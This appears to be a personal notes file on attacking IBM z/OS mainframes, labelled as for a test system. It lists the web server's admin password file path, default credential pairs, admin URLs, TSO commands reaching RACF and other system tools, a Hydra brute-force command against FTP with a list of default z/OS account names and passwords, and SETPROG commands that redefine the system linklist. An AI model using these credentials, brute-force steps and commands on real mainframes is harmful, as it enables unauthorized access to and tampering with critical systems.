IBM

         _
       .~q`,
      {__,  \
          \' \
           \  \
            \  \
             \  `._            __.__
              \    ~-._  _.==~~     ~~--.._
               \        '                  ~-.
                \      _-   -_                `.
                 \    /       }        .-    .  \
                  `. |      /  }      (       ;  \
                    `|     /  /       (       :   '\
                     \    |  /        |      /       \
                      |     /`-.______.\     |~-.      \
                      |   |/           (     |   `.      \_
                      |   ||            ~\   \      '._    `-.._____..----..___
                      |   |/             _\   \         ~-.__________.-~~~~~~~~~'''
                    .o'___/            .o______}


-----------------------------------------------------------------------------------
                      THIS IS A TESTING PROPOSE MAINFRAME
-----------------------------------------------------------------------------------

                         NOTES ABOUT MAINFRAME HACKING


IBM WEB SERVER
--------------

# INFO
http://hcmvsp.hc.unicamp.br/Docs/icsur006.html

# LOCAL USERS
/usr/lpp/internet/server_root/Admin/webadmin.passwd

TSO SR CLASS(USER) GID(205)
WEBADM/WEBADM
WEBSRV/WEBSRV

# SURROGATES -> WEBSRV
WEBADM
PUBLIC
INTERNAL
PRIVATE

# URL
http://192.168.1.4/Docs/2tabindex.html
http://192.168.1.4/admin-bin/webexec/cfgstart.html

# EXPIRED PASS
http://192.168.1.4/admin-bin/webexec/cfgstart.html?retry=RetryRequest
http://192.168.1.4/admin-bin/webexec/cfginit.html


ACCESS TO COMMANDS
------------------

TSO ISRDDN          # Current Dataset Allocs
TSO GIMSTART        # System Modification Program/Extended
TSO DGTFMD01        # Integrated Storage Management Facility
PDF PANEL(ICHP00)   # Resource Access Control Facility        # TSO RACF
TSO CBDCHCD         # Hardware Configuration Dialogs
TSO ISFISP          # Spool Search and Display Facility
TSO IPCS            # Interactive Problem Control System      # TSO Z18, TSO Z19
TSO DITTO           # DITTO/ESA for MVS Version 1
TSO RMF             # Resource Measurement Facility
TSO OMVS            # MVS OpenEdition
PDF PANEL(ATRFPCMN) # Resource Recovery Services              # TSO RRS
TSO CSQOREXX        # WMQ Series Operations and Control
PDF PANEL(FMNSTASK) # File Manager 3.1.0perations and Control
TSO IWMARIN0        # WLM Workload Manager
ISRROUTE DAL        # Dialog Test
ISRROUTE U1         # Library
ISRROUTE U2         # Data set
ISRROUTE U3         # Move/Copy
ISRROUTE U4         # Data Set List

** PDF -> COMMAND FROM READY PROMPT (OUT OF ISPF) **


USER BRUTEFORCE
---------------

# TOOL
http://0xa.li/hydra-7-4-2/

# USER/PASS LIST
C:\> TYPE USERS.TXT
BPXOINIT
DB8GRFSH
DB9GENV5
DB9GRFSH
DSN1WLM1
FTPD
IBMUSER
INETD
INTERNAL
OMVSKERN
OPEN1
OPEN2
OPEN3
PRIVATE
PUBLIC
SSHD
START1
START2
SYSADM
SYSOPR
TCPIP
UUCP
WEBADM
WEBSRV

C:\> TYPE PASS.TXT
TEST
SYS1

# COMMAND - WARNING: 5 TRIES!
C:\> hydra.exe -L USERS.txt -P PASS.TXT -e nsr 192.168.1.4 ftp

# LIST A LINKLIST
/D PROG,LNKLST

CSV470I 23.09.04 LNKLST DISPLAY 871
LNKLST SET LNKLST00   LNKAUTH=LNKLST
ENTRY  APF  VOLUME  DSNAME
   1    A   ZARES1  SYS1.LINKLIB
   2    A   ZARES1  SYS1.MIGLIB
   3    A   ZARES1  SYS1.CSSLIB
   4    A   ZARES1  SYS1.SIEALNKE
   5    A   ZARES1  SYS1.SIEAMIGE
   6    A   ZARES1  SYS1.SHASLNKE
   7    A   ZASYS1  USER.LINKLIB
   8    A   ZARES1  SYS1.SERBLINK
   9        ZARES2  NET530.SCNMLNK1
  10    A   ZARES2  IGY410.SIGYCOMP
  11    A   ZARES1  EQA810.SEQABMOD
  12        ZARES1  EQA810.SEQAMOD
  13        ZARES1  FAN140.SEAGALT
  14        ZARES1  FAN140.SEAGLMD
  15        ZARES1  FAN140.SFANLMD
  16    A   ZARES1  DIT130.SDITMOD1
  17    A   ZAPRD2  CSQ700.SCSQLINK
  18    A   ZAPRD2  CSQ700.SCSQSNLE
  19        ZARES2  ISF.SISFLOAD
  20        ZARES2  ISF.SISFLINK
  21        ZARES2  ISF.SISFMOD1
  22    A   ZARES1  SYS1.SHASMIG
  23        ZARES1  SYS1.SCBDHENU
  24    A   ZARES2  CSF.SCSFMOD0
  25        ZARES2  EOY.SEOYLOAD
  26    A   ZARES1  SYS1.SBDTCMD
  27        ZARES1  SYS1.DGTLLIB
  28    A   ZARES1  SYS1.SBDTLIB
  29        ZARES1  SYS1.SBDTLINK
  30        ZARES1  SYS1.CMDLIB
  31    A   ZARES1  GIM.SGIMLMD0
  32    A   ZARES2  CEE.SCEERUN
  33        ZARES2  CEE.SCEERUN2
  34        ZAPRD1  CBC.SCCNCMP
  35        ZARES1  ISP.SISPLOAD
  36    A   ZARES1  FFST.SEPWMOD2
  37    A   ZARES1  FFST.SEPWMOD4
  38    A   ZARES1  TCPIP.SEZALOAD
  39        ZARES1  HLA.SASMMOD1
  40        ZARES1  SYS1.SICELINK
  41        ZARES1  SYS1.SORTLIB
  42    A   ZARES1  IOE.SIOELMOD
  43        ZARES1  IOA.SIOALMOD
  44    A   ZAPRD1  CBC.SCLBDLL
  45        ZAPRD1  CBC.SCLBDLL2
  46    A   ZARES1  SYS1.SCUNIMG
  47    A   ZADB91  DSN910.SDSNLINK
  48    A   ZACIC1  DFH320.CICS.SDFHLINK
  49    A   ZARES1  ADCD.Z110.LINKLIB

# INIT A LINKLIST
/SETPROG LNKLST,DEFINE,NAME=INITLIST
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.LINKLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.MIGLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.CSSLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SIEALNKE
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SIEAMIGE
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SHASLNKE
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=USER.LINKLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SERBLINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=NET530.SCNMLNK1
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=IGY410.SIGYCOMP
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=EQA810.SEQABMOD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=EQA810.SEQAMOD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=FAN140.SEAGALT
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=FAN140.SEAGLMD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=FAN140.SFANLMD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=DIT130.SDITMOD1
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CSQ700.SCSQLINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CSQ700.SCSQSNLE
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=ISF.SISFLOAD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=ISF.SISFLINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=ISF.SISFMOD1
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SHASMIG
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SCBDHENU
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CSF.SCSFMOD0
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=EOY.SEOYLOAD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SBDTCMD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.DGTLLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SBDTLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SBDTLINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.CMDLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=GIM.SGIMLMD0
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CEE.SCEERUN
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CEE.SCEERUN2
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CBC.SCCNCMP
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=ISP.SISPLOAD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=FFST.SEPWMOD2
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=FFST.SEPWMOD4
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=TCPIP.SEZALOAD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=HLA.SASMMOD1
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SICELINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SORTLIB
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=IOE.SIOELMOD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=IOA.SIOALMOD
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CBC.SCLBDLL
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=CBC.SCLBDLL2
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=SYS1.SCUNIMG
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=DSN910.SDSNLINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=DFH320.CICS.SDFHLINK
/SETPROG LNKLST,ADD,NAME=INITLIST,DSNAME=ADCD.Z110.LINKLIB
/SETPROG LNKLST,ACTIVATE,NAME=INITLIST

# ADD  A LINKLIST
/SETPROG LNKLST,DEFINE,NAME=NEWLIST,COPYFROM=INITLIST
/SETPROG LNKLST,ADD,NAME=NEWLIST,DSNAME=GDDM.SADMMOD,ATBOTTOM
/SETPROG LNKLST,ACTIVATE,NAME=NEWLIST

/D PROG,LNKLST